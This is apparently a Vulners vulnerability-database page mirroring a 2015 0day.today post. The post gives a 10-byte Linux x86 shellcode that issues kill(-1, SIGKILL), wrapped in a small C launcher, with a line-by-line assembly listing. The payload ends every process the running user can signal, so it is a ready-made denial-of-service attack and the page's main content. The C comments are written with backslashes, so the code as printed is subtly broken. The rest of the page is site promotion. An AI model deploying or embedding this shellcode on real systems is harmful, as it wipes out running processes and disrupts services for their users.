Lucene search
K

linux/x86 kill(-1, SIGKILL) - 10 bytes

🗓️ 05 May 2015 00:00:00Reported by Febriyanto NugrohoType 
zdt
 zdt
🔗 0day.today👁 32 Views

linux/x86 kill(-1, SIGKILL) - 10 bytes Febriyanto Nugroh

Code
// linux/x86 kill(-1, SIGKILL) - 10 bytes
// Febriyanto Nugroho

#include <stdio.h>

char shellcode[] = "\x6a\x25" 	\\ push   $0x25
                   "\x58" 	\\ pop    %eax
                   "\x6a\xff" 	\\ push   $0xffffffff = -1
                   "\x5b" 	\\ pop    %ebx
                   "\xb1\x09" 	\\ mov    $0x9,%cl
                   "\xcd\x80"; 	\\ int    $0x80

int main(int argc, char **argv) {
asm("jmp %0;" : "=m" (shellcode));
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2015 00:00Current
0.7Low risk
Vulners AI Score0.7
32